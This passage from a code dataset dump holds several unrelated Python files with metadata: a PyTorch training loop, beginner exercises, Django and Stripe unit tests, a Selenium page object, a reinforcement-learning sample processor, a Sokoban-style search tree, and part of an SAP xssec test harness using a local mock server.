X[i:i + bs]\n y = model(XX)\n loss = loss_fn(y, Y[i:i + bs])\n avg_loss += loss.item()\n loss.backward()\n optim.step()\n optim.zero_grad()\n accuracy = (torch.argmax(y, -1) == Y[i:i + bs]).sum().float() / XX.shape[0]\n avg_acc += accuracy\n c += 1\n if epoch % 4 == 0:\n model.eval()\n val_loss = 0.0\n val_acc = 0.0\n vc = 0\n\n for i in range(0, len(vX), bs):\n vXX = vX[i:i + bs]\n vy = model(vXX)\n loss = loss_fn(vy, vY[i:i + bs])\n val_loss += loss.item()\n val_acc += (torch.argmax(vy, -1) == vY[i:i + bs]).sum().float() / vXX.shape[0]\n vc += 1\n val_loss /= vc\n val_acc /= vc\n ic(val_loss, val_acc)\n vh_loss.append(val_loss)\n vh_acc.append(val_acc)\n\n\n plt.clf()\n plt.plot(range(len(h_loss)), h_loss)\n plt.plot(range(0, len(vh_loss) * 4, 4), vh_loss)\n plt.xlabel(\"epochs\")\n plt.ylabel(\"loss\")\n # plt.show()\n plt.savefig(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\plots\\\\loss_\"+str(fold)+\".png\")\n plt.clf()\n plt.plot(range(len(h_acc)), h_acc)\n plt.plot(range(0, len(vh_acc) * 4, 4), vh_acc)\n plt.xlabel(\"epochs\")\n plt.ylabel(\"accuracy\")\n #plt.show()\n plt.savefig(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\plots\\\\acc_\" + str(fold) + \".png\")\n plt.clf()\n\n ic(\"Field : \",fold, \" Epoch: \",epoch,\" Elapsed time: \",(time.time()-e_start)/60)\n avg_acc /= c\n avg_loss /= c\n ic(epoch, avg_loss, avg_acc)\n h_loss.append(avg_loss)\n h_acc.append(avg_acc)\n ic(\"Finished 1 fold in \",(time.time()- onefold)/60)\n torch.save(model.state_dict(), \"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\models\\\\model_\"+str(fold)+\".pth\")\n\n #\n#eval_videos = pickle.load(open(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\saved\\\\evalvideos.pkl\",\"rb\"))\n#eval_labels = pickle.load(open(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\saved\\\\evallabels.pkl\",\"rb\"))\n#\n#videos = np.array(processed_videos)\n#ic(videos.shape )\n#ic(type(processed_videos),type(eval_videos))\n#processed_videos.extend(eval_videos)\n#ic(np.array(processed_videos).shape)","sub_path":"src/partest.py","file_name":"partest.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"566924149","text":"sandwich_orders = ['veggie', 'pastrami', 'grilled cheese', 'pastrami', 'turkey', 'roast beef', 'pastrami', 'veggie', 'pastrami']\nfinished_sandwiches = []\n\nprint(\"\\nSorry, our Deli is out of Pastrami\")\nwhile 'pastrami' in sandwich_orders:\n sandwich_orders.remove('pastrami')\n\nprint(\"\\n\")\nwhile sandwich_orders: \n current_sanduiche = sandwich_orders.pop()\n print(\"I'm working on you {} sandwich.\".format(current_sanduiche))\n finished_sandwiches.append(current_sanduiche)\n \nprint(\"\\n\")\nfor sandwich in finished_sandwiches: \n print(\"I made a {} sandwich.\".format(sandwich))\n","sub_path":"Chap 7 User input and While Loops/7_9_No_pastrami.py","file_name":"7_9_No_pastrami.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"588419282","text":"\"\"\"\n.. module:: dj-stripe.tests.test_mixins\n :synopsis: dj-stripe Mixin Tests.\n\n.. moduleauthor:: Alex Kavanaugh (@kavdev)\n\n\"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.urlresolvers import reverse\nfrom django.http.request import HttpRequest\nfrom django.test.client import RequestFactory\nfrom django.test.testcases import TestCase\n\nimport stripe\nfrom mock import patch, PropertyMock\n\nfrom djstripe.mixins import SubscriptionPaymentRequiredMixin, PaymentsContextMixin, SubscriptionMixin\n\n\nclass TestSubscriptionPaymentRequiredMixin(TestCase):\n\n def setUp(self):\n self.request = HttpRequest()\n self.user = get_user_model().objects.create(username=\"x\", email=\"user@test.com\")\n self.superuser = get_user_model().objects.create(username=\"y\", email=\"superuser@test.com\", is_superuser=True)\n\n @patch(\"djstripe.mixins.subscriber_has_active_subscription\", return_value=False)\n def test_dispatch_inactive_subscription(self, subscriber_has_active_subscription_mock):\n self.request.user = self.user\n\n mixin = SubscriptionPaymentRequiredMixin()\n\n response = mixin.dispatch(self.request)\n self.assertEqual(response.url, reverse(\"djstripe:subscribe\"))\n\n subscriber_has_active_subscription_mock.assert_called_once_with(self.user)\n\n @patch(\"djstripe.mixins.subscriber_has_active_subscription\", return_value=True)\n def test_dispatch_active_subscription(self, subscriber_has_active_subscription_mock):\n self.request.user = self.superuser\n\n mixin = SubscriptionPaymentRequiredMixin()\n self.assertRaises(AttributeError, mixin.dispatch, self.request)\n\n\nclass TestPaymentsContextMixin(TestCase):\n\n def test_get_context_data(self):\n from django.conf import settings\n from djstripe import settings as djstripe_settings\n\n class TestSuperView(object):\n def get_context_data(self):\n return {}\n\n class TestView(PaymentsContextMixin, TestSuperView):\n pass\n\n context = TestView().get_context_data()\n self.assertIn(\"STRIPE_PUBLIC_KEY\", context, \"STRIPE_PUBLIC_KEY missing from context.\")\n self.assertEqual(context[\"STRIPE_PUBLIC_KEY\"], settings.STRIPE_PUBLIC_KEY, \"Incorrect STRIPE_PUBLIC_KEY.\")\n\n self.assertIn(\"PLAN_CHOICES\", context, \"PLAN_CHOICES missing from context.\")\n self.assertEqual(context[\"PLAN_CHOICES\"], djstripe_settings.PLAN_CHOICES, \"Incorrect PLAN_CHOICES.\")\n\n self.assertIn(\"PLAN_LIST\", context, \"PLAN_LIST missing from context.\")\n self.assertEqual(context[\"PLAN_LIST\"], djstripe_settings.PLAN_LIST, \"Incorrect PLAN_LIST.\")\n\n self.assertIn(\"PAYMENT_PLANS\", context, \"PAYMENT_PLANS missing from context.\")\n self.assertEqual(context[\"PAYMENT_PLANS\"], djstripe_settings.PAYMENT_PLANS, \"Incorrect PAYMENT_PLANS.\")\n\n\nclass TestSubscriptionMixin(TestCase):\n\n @patch(\"stripe.Customer.create\", return_value=PropertyMock(id=\"cus_xxx1234567890\"))\n def test_get_context_data(self, stripe_create_customer_mock):\n\n class TestSuperView(object):\n def get_context_data(self):\n return {}\n\n class TestView(SubscriptionMixin, TestSuperView):\n pass\n\n test_view = TestView()\n\n test_view.request = RequestFactory()\n test_view.request.user = get_user_model().objects.create(username=\"x\", email=\"user@test.com\")\n\n context = test_view.get_context_data()\n self.assertIn(\"is_plans_plural\", context, \"is_plans_plural missing from context.\")\n self.assertTrue(context[\"is_plans_plural\"], \"Incorrect is_plans_plural.\")\n\n self.assertIn(\"customer\", context, \"customer missing from context.\")\n\n self.assertIn(\"CurrentSubscription\", context, \"CurrentSubscription missing from context.\")\n","sub_path":"tests/test_mixins.py","file_name":"test_mixins.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"22317817","text":"# -*- coding: utf-8 -*-\n###\n# (C) Copyright (2012-2017) Hewlett Packard Enterprise Development LP\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the 'Software'), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n###\n\nfrom unittest import TestCase\n\nimport mock\n\nfrom hpOneView.connection import connection\nfrom hpOneView.image_streamer.resources.build_plans import BuildPlans\nfrom hpOneView.resources.resource import ResourceClient\n\n\nclass BuildPlansTest(TestCase):\n def setUp(self):\n self.host = '127.0.0.1'\n self.connection = connection(self.host)\n self._client = BuildPlans(self.connection)\n\n @mock.patch.object(ResourceClient, 'get_all')\n def test_get_all_called_once(self, mock_get_all):\n filter = 'name=TestName'\n sort = 'name:ascending'\n\n self._client.get_all(2, 500, filter, sort)\n\n mock_get_all.assert_called_once_with(2, 500, filter=filter, sort=sort)\n\n @mock.patch.object(ResourceClient, 'get_all')\n def test_get_all_called_once_with_default_values(self, mock_get_all):\n self._client.get_all()\n\n mock_get_all.assert_called_once_with(0, -1, filter='', sort='')\n\n @mock.patch.object(ResourceClient, 'get_by')\n def test_get_by_called_once(self, mock_get_by):\n self._client.get_by('name', 'Build Plan Name')\n\n mock_get_by.assert_called_once_with(\n 'name', 'Build Plan Name')\n\n @mock.patch.object(ResourceClient, 'get')\n def test_get_called_once(self, mock_get):\n self._client.get('3518be0e-17c1-4189-8f81-83f3724f6155')\n\n mock_get.assert_called_once_with(\n '3518be0e-17c1-4189-8f81-83f3724f6155')\n\n @mock.patch.object(ResourceClient, 'get')\n def test_get_with_uri_called_once(self, mock_get):\n uri = '/rest/build-plans/3518be0e-17c1-4189-8f81-83f3724f6155'\n self._client.get(uri)\n\n mock_get.assert_called_once_with(uri)\n\n @mock.patch.object(ResourceClient, 'create')\n def test_create_called_once_with_default_type(self, mock_create):\n information = {\n \"name\": \"OS Build Plan Name\",\n }\n mock_create.return_value = {}\n\n self._client.create(information)\n mock_create.assert_called_once_with(information, timeout=-1, default_values=self._client.DEFAULT_VALUES)\n\n @mock.patch.object(ResourceClient, 'create')\n def test_create_called_once_with_provided_type(self, mock_create):\n information = {\n \"name\": \"OS Build Plan Name\",\n }\n mock_create.return_value = {}\n\n self._client.create(information)\n mock_create.assert_called_once_with(information, timeout=-1, default_values=self._client.DEFAULT_VALUES)\n\n @mock.patch.object(ResourceClient, 'update')\n def test_update_called_once(self, mock_update):\n information = {\n \"type\": \"OeBuildPlan\",\n \"name\": \"OS Build Plan Name\",\n \"description\": \"Description of the build plan\",\n }\n expected_data = information.copy()\n mock_update.return_value = {}\n\n self._client.update(information)\n mock_update.assert_called_once_with(expected_data, timeout=-1)\n\n @mock.patch.object(ResourceClient, 'delete')\n def test_delete_called_once(self, mock_delete):\n id = 'ad28cf21-8b15-4f92-bdcf-51cb2042db32'\n self._client.delete(id, force=False)\n\n mock_delete.assert_called_once_with(id, force=False, timeout=-1)\n\n @mock.patch.object(ResourceClient, 'delete')\n def test_delete_called_once_with_force(self, mock_delete):\n id = 'ad28cf21-8b15-4f92-bdcf-51cb2042db32'\n self._client.delete(id, force=True)\n\n mock_delete.assert_called_once_with(id, force=True, timeout=-1)\n","sub_path":"tests/unit/image_streamer/resources/test_build_plans.py","file_name":"test_build_plans.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"422540993","text":"#6. * Реализовать структуру данных «Товары».\n# Она должна представлять собой список кортежей.\n# Каждый кортеж хранит инфо��мацию об отдельном товаре.\n# В кортеже должно быть два элемента — номер товара и словарь с параметрами\n# (характеристиками товара: название, цена, количество, единица измерения).\n# Структуру нужно сформировать программно, т.е. запрашивать все данные у пользователя.\n# Пример готовой структуры:\n# [\n# (1, {“название”: “компьютер”, “цена”: 20000, “количество”: 5, “eд”: “шт.”}),\n# (2, {“название”: “принтер”, “цена”: 6000, “количество”: 2, “eд”: “шт.”}),\n# (3, {“название”: “сканер”, “цена”: 2000, “количество”: 7, “eд”: “шт.”})\n# ]\n# Необходимо собрать аналитику о товарах.\n# Реализовать словарь, в котором каждый ключ — характеристика товара,\n# например название, а значение — список значений-характеристик, например список названий товаров.\n# Пример:\n# {\n# “название”: [“компьютер”, “принтер”, “сканер”],\n# “цена”: [20000, 6000, 2000],\n# “количество”: [5, 2, 7],\n# “ед”: [“шт.”]\n# }\ncol = int(input(\"Введите количество товара: \"))\n_dict = []\n_list = []\nx = 1\nwhile x <= col:\n _dict = dict({'Название:': input(\"Введите название: \"), 'Цена:': input(\"Введите цену: \"),\n 'Количество:': input('Введите количество: '), 'eд.изм:': input(\"Введите единицу измерения: \")})\n _list.append((x, _dict))\n x += 1\nfor i in _list:\n print(i)\n_analys = {'Название:': [], 'Цена:': [], 'Количество:': [], 'eд.изм:': []}\nfor _, item in _list:\n _analys['Название:'].append(item['Название:'])\n _analys['Цена:'].append(item['Цена:'])\n _analys['Количество:'].append(item['Количество:'])\n _analys['eд.изм:'].append(item['eд.изм:'])\nfor key, value in _analys.items():\n print(f'{key} {value}')","sub_path":"Lesson-02/Les02.006.zadanie.py","file_name":"Les02.006.zadanie.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"486098935","text":"from selenium.webdriver.remote.webdriver import WebDriver\r\nimport allure\r\n\r\nfrom page_objects.diprella_login_page import LoginPage\r\n\r\nclass MainPage(object):\r\n \"\"\"\r\n Test Adaptation Layer\r\n \"\"\"\r\n def __init__(self, web_driver: WebDriver):\r\n # Initialize web driver\r\n self.web_driver = web_driver\r\n self.web_driver.maximize_window()\r\n self.web_driver.get(\"https://diprella.com/\")\r\n self.web_driver.implicitly_wait(10)\r\n\r\n # Instantiating web elements\r\n\r\n self.diprella_logo = self.web_driver.find_element_by_css_selector('[class$=\"icon\"]')\r\n self.login_link = self.web_driver.find_element_by_css_selector('[class^=\"header\"][routerlink^=\"/sign-in\"]')\r\n\r\n @allure.step(\"Click on the Sign In button\")\r\n def click_on_login_link(self):\r\n self.login_link.click()\r\n allure.attach(self.web_driver.get_screenshot_as_png(), attachment_type=allure.attachment_type.PNG)\r\n return LoginPage(self.web_driver)\r\n\r\n\r\n","sub_path":"page_objects/diprella_main_page.py","file_name":"diprella_main_page.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"499225730","text":"from learning_to_adapt.samplers.base import SampleProcessor\r\nfrom learning_to_adapt.utils import tensor_utils\r\nimport numpy as np\r\n\r\n\r\nclass ModelSampleProcessor(SampleProcessor):\r\n def __init__(\r\n self,\r\n baseline=None,\r\n discount=0.99,\r\n gae_lambda=1,\r\n normalize_adv=False,\r\n positive_adv=False,\r\n recurrent=False\r\n ):\r\n\r\n self.baseline = baseline\r\n self.discount = discount\r\n self.gae_lambda = gae_lambda\r\n self.normalize_adv = normalize_adv\r\n self.positive_adv = positive_adv\r\n self.recurrent = recurrent\r\n\r\n def process_samples(self, paths, log=False, log_prefix=''):\r\n \"\"\" Compared with the standard Sampler, ModelBaseSampler.process_samples provides 3 additional data fields\r\n - observations_dynamics\r\n - next_observations_dynamics\r\n - actions_dynamics\r\n since the dynamics model needs (obs, act, next_obs) for training, observations_dynamics and actions_dynamics\r\n skip the last step of a path while next_observations_dynamics skips the first step of a path\r\n \"\"\"\r\n\r\n assert len(paths) > 0\r\n recurrent = self.recurrent\r\n # compute discounted rewards - > returns\r\n returns = []\r\n for idx, path in enumerate(paths):\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n path[\"returns\"] = tensor_utils.discount_cumsum(path[\"rewards\"], self.discount)\r\n returns.append(path[\"returns\"])\r\n\r\n\r\n\r\n # 8) log statistics if desired\r\n self._log_path_stats(paths, log=log, log_prefix=log_prefix)\r\n\r\n observations_dynamics = tensor_utils.concat_tensor_list([path[\"observations\"][:-1] for path in paths], recurrent)\r\n next_observations_dynamics = tensor_utils.concat_tensor_list([path[\"observations\"][1:] for path in paths], recurrent)\r\n actions_dynamics = tensor_utils.concat_tensor_list([path[\"actions\"][:-1] for path in paths], recurrent)\r\n timesteps_dynamics = tensor_utils.concat_tensor_list([np.arange((len(path[\"observations\"]) - 1)) for path in paths])\r\n\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n rewards = tensor_utils.concat_tensor_list([path[\"rewards\"][:-1] for path in paths], recurrent)\r\n returns = tensor_utils.concat_tensor_list([path[\"returns\"] for path in paths], recurrent)\r\n\r\n samples_data = dict(\r\n observations=observations_dynamics,\r\n next_observations=next_observations_dynamics,\r\n actions=actions_dynamics,\r\n timesteps=timesteps_dynamics,\r\n rewards=rewards,\r\n returns=returns,\r\n )\r\n\r\n return samples_data\r\n \r\n def process_samples_es(self, paths, log=False, log_prefix=''):\r\n assert len(paths)> 0\r\n recurrent = self.recurrent\r\n\r\n returns = []\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n for idx, path in enumerate(paths):\r\n dones = list(path['dones'])\r\n start_index = 0\r\n end_index = len(dones)\r\n \r\n pathreturns = []\r\n while True:\r\n try:\r\n end_index = dones.index(True, start_index)\r\n pathreturns.append(tensor_utils.discount_cumsum(path['rewards'][start_index:end_index + 1], self.discount))\r\n start_index = end_index + 1\r\n except ValueError:\r\n if start_index < len(dones):\r\n pathreturns.append(tensor_utils.discount_cumsum(path['rewards'][start_index:], self.discount))\r\n break\r\n path['returns'] = tensor_utils.concat_tensor_list(pathreturns, False)\r\n returns.append(path[\"returns\"])\r\n \r\n # 8) log statistics if desired\r\n self._log_path_stats(paths, log=log, log_prefix=log_prefix)\r\n \r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n \r\n list_obs = []\r\n list_nobs = []\r\n list_act = []\r\n list_timstp = []\r\n list_rws = []\r\n list_rtrns = []\r\n\r\n for path in paths:\r\n dones = list(path['dones'])\r\n start_index = 0\r\n end_index = len(dones)\r\n while True:\r\n try:\r\n end_index = dones.index(True, start_index)\r\n list_obs.append(path['observations'][start_index:end_index])\r\n list_nobs.append(path['observations'][start_index + 1:end_index + 1])\r\n list_act.append(path['actions'][start_index:end_index])\r\n list_timstp.append(np.arange(0, end_index - start_index))\r\n list_rws.append(path['rewards'][start_index:end_index])\r\n list_rtrns.append(path['returns'][start_index + 1:end_index + 1])\r\n \r\n start_index = end_index + 1\r\n except ValueError:\r\n if start_index < len(dones):\r\n list_obs.append(path['observations'][start_index:-1])\r\n list_nobs.append(path['observations'][start_index + 1:])\r\n list_act.append(path['actions'][start_index:-1])\r\n list_timstp.append(np.arange(start_index,len(dones)-1))\r\n list_rws.append(path['rewards'][start_index:-1])\r\n list_rtrns.append(path['returns'][start_index + 1:])\r\n break\r\n\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n observations_dynamics = tensor_utils.concat_tensor_list(list_obs, recurrent)\r\n next_observations_dynamics = tensor_utils.concat_tensor_list(list_nobs, recurrent)\r\n actions_dynamics = tensor_utils.concat_tensor_list(list_act, recurrent)\r\n timesteps_dynamics = tensor_utils.concat_tensor_list(list_timstp)\r\n rewards = tensor_utils.concat_tensor_list(list_rws)\r\n returns = tensor_utils.concat_tensor_list(returns)\r\n\r\n samples_data = dict(\r\n observations=observations_dynamics,\r\n next_observations=next_observations_dynamics,\r\n actions=actions_dynamics,\r\n timesteps=timesteps_dynamics,\r\n rewards=rewards,\r\n returns=returns,\r\n )\r\n\r\n return samples_data\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n","sub_path":"learning_to_adapt/samplers/model_sample_processor.py","file_name":"model_sample_processor.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643001009","text":"from django.conf.urls.defaults import *\nfrom trocaire.settings import *\nfrom os import path as os_path\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^admin/', include(admin.site.urls)),\n (r'^ingresos/', include('trocaire.ingresos.urls')),\n (r'^produccion/', include('trocaire.produccion.urls')),\n (r'^propiedad/', include('trocaire.formas_propiedad.urls')),\n (r'^', include('trocaire.medios.urls')),\n)\n\nif DEBUG:\n urlpatterns += patterns('',\n (r'^archivos/(.*)$', 'django.views.static.serve',\n {'document_root': os_path.join(MEDIA_ROOT)}),\n )\n","sub_path":"trocaire/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"14904641","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''Setup script for goslate'''\n\nimport os\nimport goslate as module\n\n__author__ = 'ZHUO Qiang'\n__date__ = '2013-05-14'\n\nimport os\nfrom setuptools import setup\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname), 'rb').read().decode('utf-8')\n\nsetup(\n name = module.__name__,\n version = module.__version__,\n author = module.__author__,\n author_email = module.__email__,\n description = module.__doc__,\n license = module.__license__,\n keywords = \"google translation i18n l10n\",\n url = module.__download__,\n packages=[],\n py_modules=['goslate'],\n long_description=read('README.rst'),\n install_requires=['futures'], \n test_suite='test_goslate',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Software Development :: Internationalization',\n 'Topic :: Software Development :: Localization',\n 'Topic :: Text Processing :: Linguistic',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"363036951","text":"\"\"\"Exercício criado por: https://www.cursoemvideo.com/\n093: Crie um programa que gerencie o aproveitamento de um jogador de futebol.\nO programa vai ler o nome do jogador e quantas partidas ele jogou. Depois vai\nler a quantidade de gols feitos em cada partida. No final, tudo isso será guardado\nem um dicionário, incluindo o total de gols feitos durante o campeonato.\"\"\"\n\n\ncamp = dict()\ncamp['nome'] = str(input('Nome do jogador: ')).strip().capitalize()\npartidas = int(input(f'Quantas partidas {camp[\"nome\"]} jogou? '))\ngols = []\nsoma = 0\nfor p in range(partidas):\n gols.append(int(input(f'Quantos gols na partida {p + 1}? ')))\n soma += gols[p]\ncamp['gols'] = gols[:]\ncamp['total'] = soma\nprint('-='*30)\nprint(camp)\nprint('-='*30)\nfor c, v in camp.items():\n print(f'O campo {c} tem o valor {v}.')\nprint('-='*30)\nprint(f'O jogador {camp[\"nome\"]} jogou {partidas} partidas.')\nfor p in range(partidas):\n print(f'\\t=> Na partida {p + 1}, fez {camp[\"gols\"][p]} gols.')\nprint(f'Foi um total de {camp[\"total\"]} gols.')\n","sub_path":"curso_em_video/exe093.py","file_name":"exe093.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"594744954","text":"# código retirado do exemplo das aulas práticas\n\nfrom abc import ABC, abstractmethod\nimport time\nimport asyncio\nimport queue\n\nclass SearchDomain(ABC):\n \n # construtor\n @abstractmethod\n def __init__(self):\n pass\n\n # lista de accoes possiveis num estado\n @abstractmethod\n def actions(self, state):\n pass\n\n # resultado de uma accao num estado, ou seja, o estado seguinte\n @abstractmethod\n def result(self, state, action):\n pass\n\n # custo de uma accao num estado\n @abstractmethod\n def cost(self, state, action):\n pass\n\n # custo estimado de chegar de um estado a outro\n @abstractmethod\n def heuristic(self, state, goal):\n pass\n\n # test if the given \"goal\" is satisfied in \"state\"\n @abstractmethod\n def satisfies(self, state, goal):\n pass\n \nclass SearchProblem:\n def __init__(self, domain, initial, goal):\n self.domain = domain\n self.initial = initial\n self.goal = goal\n \n def goal_test(self, state):\n return self.domain.satisfies(state, self.goal)\n \nclass SearchNode:\n def __init__(self, state, parent , depth, cost, heuristic, action, keeper, movements, counter, hash_): \n self.state = state\n self.parent = parent\n self.depth = depth\n self.cost = cost\n self.heuristic = heuristic\n self.action = action\n \n self.keeper = keeper\n self.movements = movements\n self.counter = counter\n self.hash_ = hash_\n \n def __str__(self):\n return \"no(\" + str(self.state) + \",\" + str(self.parent) + \")\"\n \n def __repr__(self):\n return str(self)\n \n def __lt__(self, node):\n return self.counter > node.counter\n \nclass SearchTree:\n \n # construtor\n def __init__(self,problem, keeper_coord): \n self.problem = problem\n root = SearchNode(problem.initial, None, 0, 0, problem.domain.heuristic(problem.initial, problem.goal), None, keeper_coord, '', 0, hash(''))\n \n self.open_nodes = queue.PriorityQueue()\n self.open_nodes.put((0, root))\n \n self.terminals = 0\n self.non_terminals = 1\n self.visited = set()\n self.in_queue = {hash('')}\n self.counter = 0\n \n @property\n def length(self):\n return self.solution.depth\n \n @property\n def cost(self):\n return self.solution.cost\n \n @property\n def avg_branching(self):\n return (self.terminals + self.non_terminals - 1) / self.non_terminals\n\n # obter o caminho (sequencia de estados) da raiz ate um no\n def get_path(self,node):\n if node.parent == None:\n return [node.state]\n path = self.get_path(node.parent)\n path += [node.state]\n return path\n \n def get_plan(self, node):\n if node.parent == None:\n return ''\n plan = self.get_plan(node.parent)\n plan += node.movements + node.action\n return plan\n \n @property\n def plan(self):\n return self.get_plan(self.solution)\n \n async def search(self):\n while not self.open_nodes.empty():\n await asyncio.sleep(0)\n priority, node = self.open_nodes.get()\n \n if self.problem.goal_test(node.state):\n self.solution = node\n self.terminals = self.open_nodes.qsize()\n return True\n \n self.visited.add(node.hash_)\n self.in_queue.remove(node.hash_)\n self.non_terminals += 1\n\n for a, mov in self.problem.domain.actions(node):\n newstate = a.result\n \n state_hash = hash(str(sorted(newstate)) + str(a.args))\n \n if state_hash in self.visited or state_hash in self.in_queue:\n continue\n \n self.in_queue.add(state_hash)\n \n heuristica = self.problem.domain.heuristic(newstate, self.problem.goal)\n newnode = SearchNode(newstate, node, node.depth + 1, 1, \n heuristica, a.__class__.__name__.lower(), a.args, mov, self.counter, state_hash)\n self.open_nodes.put((heuristica, newnode))\n \n self.counter += 1\n \n return None\n \n def searchSync(self, limit=None):\n while not self.open_nodes.empty():\n priority, node = self.open_nodes.get()\n \n if self.problem.goal_test(node.state):\n self.solution = node\n self.terminals = self.open_nodes.qsize()\n return self.get_path(node)\n\n self.non_terminals += 1\n \n self.visited.add(node.hash_)\n self.in_queue.remove(node.hash_)\n \n for a, mov in self.problem.domain.actions(node):\n \n newstate = a.result\n \n state_hash = hash(str(sorted(newstate)) + str(a.args))\n \n if state_hash in self.visited or state_hash in self.in_queue:\n continue\n \n self.in_queue.add(state_hash)\n \n custo = node.cost + self.problem.domain.cost(node.state, a)\n heuristica = self.problem.domain.heuristic(newstate, self.problem.goal)\n newnode = SearchNode(newstate, node, node.depth + 1, custo, \n heuristica, a.__class__.__name__.lower(), a.args, mov, self.counter, state_hash)\n self.open_nodes.put((custo + heuristica, newnode))\n self.counter += 1\n return None\n","sub_path":"tree_search.py","file_name":"tree_search.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"501923029","text":"# pylint: disable=missing-docstring,invalid-name,missing-docstring\nimport unittest\nfrom os import environ, path, devnull\nimport socket\nfrom time import sleep\nfrom subprocess import Popen\n\nfrom sap.xssec import jwt_validation_facade\n\nfrom sap import xssec\nfrom tests import uaa_configs\nfrom tests import jwt_payloads\nfrom tests.jwt_tools import sign\n\nTEST_SERVER_POLL_ATTEMPTS = 10\n\n\ndef get_free_tcp_port():\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp.bind(('', 0))\n _, port = tcp.getsockname()\n tcp.close()\n return port\n\n\nflask_env = environ.copy()\n\nflask_env['FLASK_APP'] = path.join(path.dirname(\n path.abspath(__file__)), 'utils', 'uaa_mock.py')\nflask_port = str(get_free_tcp_port())\nflask_url = 'http://localhost:' + flask_port\n\n\nclass ReqTokenForClientTest(unittest.TestCase):\n DEVNULL = None\n flask_process = None\n\n @classmethod\n def setUpClass(cls):\n \"\"\" Test class static setup \"\"\"\n environ[\"SAP_EXT_JWT_ALG\"] = \"*\"\n\n cls.DEVNULL = open(devnull, 'w')\n cls.flask_process = Popen(['flask', 'run', '-p', flask_port, '-h', 'localhost'],\n env=flask_env, stdout=cls.DEVNULL, stderr=cls.DEVNULL)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n poll = 0\n\n while poll != TEST_SERVER_POLL_ATTEMPTS:\n try:\n sleep(1)\n poll += 1\n s.connect(('localhost', int(flask_port)))\n print('Test server is up!') # pylint: disable=superfluous-parens\n break\n except socket.error as e:\n if poll == TEST_SERVER_POLL_ATTEMPTS:\n print(\n 'Test server could not start!') # pylint: disable=superfluous-parens\n raise e\n s.close()\n\n jwt_validation_facade.ALGORITHMS = ['RS256', 'HS256']\n\n @classmethod\n def tearDownClass(cls):\n if cls.flask_process:\n cls.flask_process.terminate()\n if cls.DEVNULL:\n cls.DEVNULL.close()\n\n def _request_token_for_client_error(self, sec_context, url, error_message_end):\n service_credentials = {\n 'clientid': 'clientid',\n 'clientsecret': 'clientsecret',\n 'url': url\n }\n with self.assertRaises(RuntimeError) as ctx:\n sec_context.request_token_for_client(service_credentials, None)\n self.assertTrue(str(ctx.exception).endswith(error_message_end))\n\n def test_request_token_for_client_missing_uaa_user_scope(self):\n '''\n Test valid end-user token no attributes.\n request_token_for_client failure, scope uaa.user missing\n '''\n sec_context = 